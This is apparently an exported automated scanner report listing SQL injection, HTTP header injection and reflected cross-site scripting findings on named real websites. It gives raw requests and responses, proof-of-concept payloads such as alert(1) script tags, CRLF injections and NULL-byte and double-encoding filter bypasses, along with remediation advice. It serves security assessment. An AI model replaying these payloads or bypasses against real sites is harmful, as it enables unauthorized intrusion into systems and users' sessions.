HTTP/1.1 500 Internal Server Error Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: text/html;charset=ISO-8859-1 Date: Wed, 05 Oct 2011 20:50:17 GMT Connection: close X-xgen-cache: yes X-Cache-Info: not cacheable; response code not cacheable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF ...[SNIP]... <br>
The REST URL parameter 8 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 8, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
HTTP/1.1 500 Internal Server Error Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: text/html;charset=ISO-8859-1 Date: Wed, 05 Oct 2011 20:50:19 GMT Connection: close X-xgen-cache: yes X-Cache-Info: not cacheable; response code not cacheable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF ...[SNIP]... <br>
The spaceKey parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the spaceKey parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The spaceKey parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the spaceKey parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The spaceKey parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the spaceKey parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 500 Internal Server Error Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: text/html; charset=UTF-8 Date: Wed, 05 Oct 2011 20:50:28 GMT Connection: close X-xgen-cache: yes X-Cache-Info: not cacheable; response code not cacheable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF ...[SNIP]... org.springframework.dao.DataIntegrityViolationException: Hibernate operation: Could not execute query; SQL []; ERROR: invalid byte sequence for encoding "UTF8": 0x00; nested exception is org.postgresql.util.PSQLException: ERROR: invalid byte sequence for encoding "UTF8": 0x00<br> ...[SNIP]...
1.46. http://www.mongodb.org/s/1627/3/3/_/styles/colors.css [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.mongodb.org
Path:
/s/1627/3/3/_/styles/colors.css
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The spaceKey parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the spaceKey parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The spaceKey parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the spaceKey parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The spaceKey parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the spaceKey parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The spaceKey parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the spaceKey parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The spaceKey parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the spaceKey parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The spaceKey parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the spaceKey parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
CDbCommand failed to execute the SQL statement: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')) ORDER BY C.start_ts ASC LIMIT 1372) ' at line 3
2. HTTP header injectionpreviousnext There are 3 instances of this issue:
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of REST URL parameter 2 is copied into the Location response header. The payload 5f224%0d%0a4ea4acacfd7 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
The value of the dcmt request parameter is copied into the Content-Type response header. The payload 8e984%0d%0af1fa4b4f7b6 was submitted in the dcmt parameter. This caused a response containing an injected HTTP header.
The value of the noFormURL request parameter is copied into the Location response header. The payload 509b2%0d%0a0404ce4801a was submitted in the noFormURL parameter. This caused a response containing an injected HTTP header.
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the @CPSC@ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload efd5b'%3balert(1)//b9c84530d46 was submitted in the @CPSC@ parameter. This input was echoed as efd5b';alert(1)//b9c84530d46 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.2. http://ad.adlegend.com/jscript [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.adlegend.com
Path:
/jscript
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9121b'-alert(1)-'fc30105dd5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ab84'%3balert(1)//f4b857f52a7 was submitted in the target parameter. This input was echoed as 9ab84';alert(1)//f4b857f52a7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.4. http://ad.burstdirectads.com/st [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.burstdirectads.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21da1"><script>alert(1)</script>a1f0873c55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?ad_type=iframe&ad_size=300x250§ion=2551311&bur=81736&x=http://www.burstnet.com/ads/ad18241a-map.cgi/BCPG175221.253830.503405/VTS=3X3qJ.u_y6/SZ=300X250A/V=2.3S//ST=0Ok20i9I10y320qZ1oPTEB2_3S02vc02vc/REDIRURL=&21da1"><script>alert(1)</script>a1f0873c55=1 HTTP/1.1 Host: ad.burstdirectads.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.multiplayergames.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 20:47:20 GMT Server: YTS/1.19.8 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Wed, 05 Oct 2011 20:47:20 GMT Pragma: no-cache Age: 0 Proxy-Connection: keep-alive Content-Length: 5345
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id= ...[SNIP]... <a href="http://ad.burstdirectads.com/imageclick?21da1"><script>alert(1)</script>a1f0873c55=1&Z=300x250&bur=81736&s=2551311&x=http%3a%2f%2fwww.burstnet.com%2fads%2fad18241a%2dmap.cgi%2fBCPG175221.253830.503405%2fVTS%3d3X3qJ.u%5fy6%2fSZ%3d300X250A%2fV%3d2.3S%2f%2fST%3d0Ok20i9I10y320qZ1oPTEB2% ...[SNIP]...
3.5. http://ad.burstdirectads.com/st [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.burstdirectads.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b318"-alert(1)-"43e5161bf84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=300x250§ion=2551311&bur=81736&x=http://www.burstnet.com/ads/ad18241a-map.cgi/BCPG175221.253830.503405/VTS=3X3qJ.u_y6/SZ=300X250A/V=2.3S//ST=0Ok20i9I10y320qZ1oPTEB2_3S02vc02vc/REDIRURL=&7b318"-alert(1)-"43e5161bf84=1 HTTP/1.1 Host: ad.burstdirectads.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.multiplayergames.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 20:47:20 GMT Server: YTS/1.19.8 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Wed, 05 Oct 2011 20:47:20 GMT Pragma: no-cache Age: 0 Proxy-Connection: keep-alive Content-Length: 5303
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.burstdirectads.com/imp?7b318"-alert(1)-"43e5161bf84=1&Z=300x250&bur=81736&s=2551311&x=http%3a%2f%2fwww.burstnet.com%2fads%2fad18241a%2dmap.cgi%2fBCPG175221.253830.503405%2fVTS%3d3X3qJ.u%5fy6%2fSZ%3d300X250A%2fV%3d2.3S%2f%2fST%3d0Ok20i9I10y320qZ1oPTEB2% ...[SNIP]...
The value of the dom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b2b1"%3balert(1)//d406693461b was submitted in the dom parameter. This input was echoed as 9b2b1";alert(1)//d406693461b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the flash request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da339'%3balert(1)//9d27b7a2543 was submitted in the flash parameter. This input was echoed as da339';alert(1)//9d27b7a2543 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ef9e'-alert(1)-'3f0794b59ee was submitted in the redir parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the time request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7532b'%3balert(1)//4a891d65b27 was submitted in the time parameter. This input was echoed as 7532b';alert(1)//4a891d65b27 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the &callback request parameter is copied into the HTML document as plain text between tags. The payload 785f4<script>alert(1)</script>66aad21ad39 was submitted in the &callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload d311a<script>alert(1)</script>1d048d63422 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 659a8<script>alert(1)</script>97957b9b5b8 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload 7326d<script>alert(1)</script>eba2e7e64dc was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e453e<script>alert(1)</script>91a75530fb2 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/widgets/4e261f7efffffa1312583821/thenextweb.com.json?callback=Badgeville.bv_cp0e453e<script>alert(1)</script>91a75530fb2&version=v2&_=1317847267367 HTTP/1.1 Host: api.v2.badgeville.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: nginx/0.8.55 Date: Wed, 05 Oct 2011 20:41:25 GMT Content-Type: text/javascript; charset=utf-8 Connection: close Status: 200 OK Last-Modified: Tue, 16 Aug 2011 18:14:07 GMT X-Runtime: 0.041403 Set-Cookie: _Badgeville_session=BAh7BiIPc2Vzc2lvbl9pZCIlNDdkZjY3NDk4YTgzNGYxYmI4NzYwYjRiM2IxNGU2MzA%3D--8b852118631080b84e9d274ba37434848f105084; path=/; expires=Wed, 19-Oct-2011 20:41:25 GMT; HttpOnly Cache-Control: max-age=0, private, must-revalidate Content-Length: 1408
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 7b394<script>alert(1)</script>7728f0b8339 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the func request parameter is copied into the HTML document as plain text between tags. The payload a284e<script>alert(1)</script>2bf29bd6e1a was submitted in the func parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: nginx Date: Wed, 05 Oct 2011 21:13:08 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 83
The value of the adpos request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a36e"><script>alert(1)</script>5f73c1757ef was submitted in the adpos parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the atype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bafe3"><script>alert(1)</script>689ab2541e9 was submitted in the atype parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the bidder request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13ead"><script>alert(1)</script>17c0bcecbe5 was submitted in the bidder parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the datc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0522"><script>alert(1)</script>391af6259ec was submitted in the datc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the dc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af091"><script>alert(1)</script>e19a7ee16f3 was submitted in the dc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the dom request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3410b"><script>alert(1)</script>e875639c3a2 was submitted in the dom parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the eid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c658"><script>alert(1)</script>493dfe1f8c5 was submitted in the eid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the ht request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f36c7"><script>alert(1)</script>0735a5f57f5 was submitted in the ht parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the ibs request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 996f0"><script>alert(1)</script>6ebd514624f was submitted in the ibs parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the poo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62468"><script>alert(1)</script>d1df17537fc was submitted in the poo parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the sid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b9c5"><script>alert(1)</script>48c2cd12581 was submitted in the sid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the sig request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80b16"><script>alert(1)</script>783c5556847 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the st request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6b5e"><script>alert(1)</script>2f9aa55d8cd was submitted in the st parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the stid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1092"><script>alert(1)</script>8ac10f85f2b was submitted in the stid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7ea1"><script>alert(1)</script>cad35c4bc85 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the wh request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcafe"><script>alert(1)</script>248a71ad420 was submitted in the wh parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the adpos request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b19b"><script>alert(1)</script>002eeaa7af8 was submitted in the adpos parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the atype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 920c1"><script>alert(1)</script>b3a103ed94f was submitted in the atype parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the bidder request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fefb"><script>alert(1)</script>5a00be50b31 was submitted in the bidder parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the datc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab278"><script>alert(1)</script>8004c2bdc0b was submitted in the datc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the dc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbf0c"><script>alert(1)</script>f98a024da8a was submitted in the dc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the dom request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8499"><script>alert(1)</script>a3ca4e080d0 was submitted in the dom parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the eid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6dfa"><script>alert(1)</script>ba971af3b5 was submitted in the eid parameter. This input was echoed unmodified in the application's response.
